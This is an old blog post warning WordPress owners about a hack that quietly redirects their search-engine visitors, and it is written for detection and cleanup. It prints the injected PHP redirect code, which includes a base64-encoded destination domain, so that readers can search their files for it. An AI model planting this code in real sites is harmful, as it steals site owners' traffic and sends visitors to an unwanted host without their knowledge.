I’ve seen a lot of sites (Shoemoney, Digital Point, Ocaoimh) reporting about a Wordpress hack that will “steal” your search engine traffic . As always it’s important to upgrade your Wordpress (or any software for that case) installation when a new security fix is released. Luckily Wordpress is pretty safe so you don’t have to upgrade too often and it’s really easy to upgrade your installation even if you got a few plugins

This hack is hard for you (the blog owner) to detect since it’s just taking your search engine traffic and will never “steal” any visitors that have accessed your blog before. According to ocaoimh.ie you should look for this code in your .php files (for example wp-blog-header.php):

< ?php $seref=array("google","msn","live","altavista","ask","yahoo","aol", "cnn","weather","alexa");

$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }

if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>

This hack is hard to detect since you the blog owner will see your own site/blog (you’re not finding your own blog via a search engine every time you post a new post right?).

Solution: Search your files for weird code, update Wordpress to the latest version and don’t forget to use hard to guess passwords.

Popularity: 7% [?]

You may also be interested in...
No related posts

This entry was posted on Friday, June 13th, 2008 at 10:24 am and is filed under Wordpress. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.